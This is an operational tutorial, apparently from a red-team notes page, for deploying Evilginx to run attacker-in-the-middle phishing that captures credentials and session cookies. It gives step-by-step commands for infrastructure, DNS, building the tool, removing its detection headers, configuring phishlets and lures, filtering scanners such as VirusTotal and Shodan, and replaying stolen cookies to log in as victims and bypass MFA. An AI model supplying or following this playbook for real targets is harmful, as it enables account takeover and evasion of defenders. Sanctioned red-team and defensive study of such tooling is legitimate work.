Attacker-in-the-Middle (Evilginx)
Evilginx is a phishing toolkit designed for attacker-in-the-middle (AitM) attacks that allow an adversary to capture login credentials and session cookies. These session cookies can be injected into a browser, bypassing traditional MFA and allowing full access to the user's account.
Evilginx Setup
Infrastructure
The easiest and (probably) most common place that Evilginx is hosted/set up is on a Linux-based virtual machine hosted by a cloud infrastructure provider (e.g. Azure/AWS).
Once your VM is created, ensure that there is no HTTP server on port 80 running on your VM. You can use netstat to check what ports are currently in use on your VM and use ps to kill the process using port 80.
# Check what ports are in use
ss -tulpn
# Kill a process
kill [process pid]You will then have to implement the following inbound networking rules on your Evilginx VM:
TCP
443
Reverse proxy HTTPS traffic
TCP
22
SSH port for remote access
UDP
53
DNS traffic for hostname resolution
Domain/DNS
You will need to buy/register a domain, from GoDaddy or Cloudflare for example, to be used as a top-level domain for your phishing URLs.
Once you have a domain, set your domain to use custom nameservers that point to your Evilginx VM's public IP (e.g. weelee.zip domain with Evilginx VM with a public IP of 1.2.3.4).
ns1.weelee.zip
ns2.weelee.zip
ns1
1.2.3.4
ns2
1.2.3.4
Evilginx Deployment
On your VM, install Golang for your distribution, pull down the source code for Evilginx from the Evilginx2 GitHub, and build Evilginx.
# Pull down Golang and set the binary location to PATH
curl -OL https://go.dev/dl/go1.22.3.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.22.3.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Modify systemd to not use port 53
sudo sed -i 's/#DNSStubListener=yes/DNSStubListener=no/' /etc/systemd/resolved.conf
sudo systemctl restart systemd-resolved
# Clone Evilginx
git clone https://github.com/kgretzky/evilginx2 /opt/evilginx2
cd /opt/evilginx2
go build
makeEvilginx comes with indicators of compromise headers in evliginx2/core/http_proxy.go. It is pretty standard procedure for most people to remove these headers.
sed -i 's/req.Header.Set(p.getHomeDir(), o_host)///req.Header.Set(p.getHomeDir(), o_host)/' evilginx/core/http_proxy.goEvilginx Usage
As with lots of tools, the help command will show you a help menu. Using the help command followed by an action command such as config or phishlets will give you the help menu for that action.
Config
If you want to quickly configure your domain to work inside Evilginx, all you have to do is set the server domain and Evilginx public IP (e.g. weelee.zip domain with Evilginx VM with a public IP of 1.2.3.4).
: config domain weelee.zip
: config domain 1.2.3.4Changing Unauthorized URL
You can change the URL where all unauthorized requests that are sent to Evilginx are redirected to. This can be a helpful way to deter scanners or bad (or would it be good?) actors.
# Change the URL for unauthorized requests
: config unauth_url https://office.comPre-Configuration/Automation
If you want to automate the deployment of your domain, phishlets, and lures, you can create a custom config.json file and place it at ~/.evilginx/config.json.
Below is an example config.json file with a pre-configured LinkedIn phishlet (taken from https://help.evilginx.com/docs/guides/config):
{
"general": {
"bind_ipv4": "127.0.0.1",
"dns_port": 53,
"domain": "not-a-phish.com",
"external_ipv4": "1.2.3.4",
"https_port": 443,
"unauth_url": "https://www.linkedin.com"
},
"phishlets": {
"linkedin": {
"hostname": "linkedin.not-a-phish.com",
"enabled": true,
"visible": true
}
},
"lures": [
{
"hostname": "",
"info": "",
"og_desc": "",
"og_image": "",
"og_title": "",
"og_url": "",
"path": "/login",
"phishlet": "linkedin",
"redirect_url": "https://www.linkedin.com",
"redirector": "",
"ua_filter": ""
}
]
}Certificates
TLS certificates are automatically generated for the domains and subdomains you use for your phishing URLs. All generated certificates are stored in ~/.local/share/certmagic.
Phishlets
Phishlets are a core part of Evilginx, as they are used to configure Evilginx for targeting specific websites. Phishlets are written in YAML and should be placed in the phishlets directory in the root directory of Evilginx.
Creating/Enabling Phishlets
In order to enable a phishlet, you must set a hostname that will be used in the phishing URL. This hostname must always end with the top-level domain used to set up Evilginx (e.g. phishlet named m365 with root domain weelee.zip).
# Set the hostname for your phishlet
: phishlets hostname m365 login.weelee.zip
# Enable your phishlet
: phishlets enable m365Hiding Phishlets
Hiding a phishlet will make Evilginx treat all requests to the valid phishing URL as unauthorized requests. If a redirect URL is not set up, Evilginx will just return a 403.
# Hide your phishlet
: phishlets hide m365
# Unhide your phishlet
: phishlets unhide m365Custom Authorized Request Redirect
Although a global redirect URL can be set using the config command, it is possible to set a custom redirect URL for your specific phishlet.
# Set redirect URL for unauthorized requests for specific phishlet
phishlets unauth_url m365 https://office.comLures
Lures are where you can get phishing links for a configured phishlet(s).
Simply create a lure for your phishlet and get the URL that you will serve your targets (e.g. phishlet named m365 with lure ID of 0):
# Create a lure for your phishlet
: lures create m365
# List all lures
: lures
# Get the phishing URL for lure ID 0
: lures get-url 0While the above is sufficient to serve a phishing page, there are multiple configurations and enhancements that can change the behavior of when a target visits your phishing URL.
Customizing Phishing URL
The default URL would look something like the following (e.g. phishlet named m365 with weelee.zip domain):
: lures get-url 0
https://m365.weelee.zip/M3r1XJKMHowever, you may want to change the subdomain used in your phishing URL. This can be done for your specific lure, as long as the top-level domain is the one you used to set up Evilginx.
# Edit the hostname for the lure with ID 0
: lures edit 0 hostname login.weelee.zipYou can also change the path of your phishing landing page for your specific lure.
# Edit the path for the lure with ID 0
lures edit 0 path /common/oauthv2User-Agent Filter
Evilginx allows you to filter out specific User Agents received within the HTTP header of the incoming request. Doing this will redirect the visitor the same way as an invalid lure URL.
# Edit what User Agents to filter using a regular expression
lures edit 0 ua_filter Mobile|Shodan|VirusTotal|curlRedirect URL
After the phished user goes through the authentication process and Evilginx is able to obtain the target user's session cookies, you can redirect them to a defined URL.
# Edit the redirect URL for the lure with ID 0
lures edit 0 redirect_url https://office.comSessions
Once a user visits your phishing URL, a new session will be created for the instance to track the progress of the phishing attempt. Any credentials or session cookies generated by the target while visiting the phishing URL will be stored within a session.
# List all sessions
: sessions
# View details of a specific session ID (credentials, session cookies, etc.)
: sessions [id]
# Delete a session
: sessions delete [id]Using Cookies From a Session
To import custom session cookies into your browser, you will need a browser extension that allows you to do so.
Chrome: EditThisCookie or Cookie-Editor
Firefox: Cookie-Editor
Once you have cleared any existing cookies in your browser, copy your captured session cookies and import it into your browser using one of the extensions listed above.
You should now be able to visit the website and your browser should automatically apply the imported session cookies and log you in as the phished user!
Proxy
Evilginx allows you to proxy outbound traffic, which I have found to be very useful to proxy your traffic through Burp Suite for phishlet development. Currently, only HTTP and SOCKS proxies are supported.
# Check current proxy settings
: proxyBy default, Burp Suite has an HTTP proxy server running on 127.0.0.1 port 8080. Let's set up a proxy for Burp Suite as an example:
# Specify the proxy type to use
: proxy type http
# Specify address and port number
: proxy address 127.0.0.1
: proxy port 8080
# Enable the proxy
: proxy disableRestart Evilginx whenever you enable or disable the outbound proxy.
Blacklist
The blacklist feature stores all IPs that make unauthorized requests to your Evilginx server in a file located at /root/.evilginx/blacklist.txt.
Unauthorized requests include the following:
Requests made to a URL not belonging to any of the enabled lures
Requests match a lure URL, but the lure phishlet is disabled or hidden
Blacklist has multiple modes that it can operate in: all, unauth, noadd, and off.
all
Block and blacklist IP of every request, including valid ones (Useful for deterring scanners)
unauth
Block and blacklist IP of every request that doesn't point to a valid lure URL (default behavior)
noadd
Block IP of every request that doesn't point to a valid lure URL (avoids blacklisting an IP that may access a valid lure URL later)
off
Block unauthorized requests, but ignore blocking IPs already blacklisted (use case is if you've somehow added a valid target's IP to your blacklist)
# Change the blacklist mode
: blacklist [mode]Last updated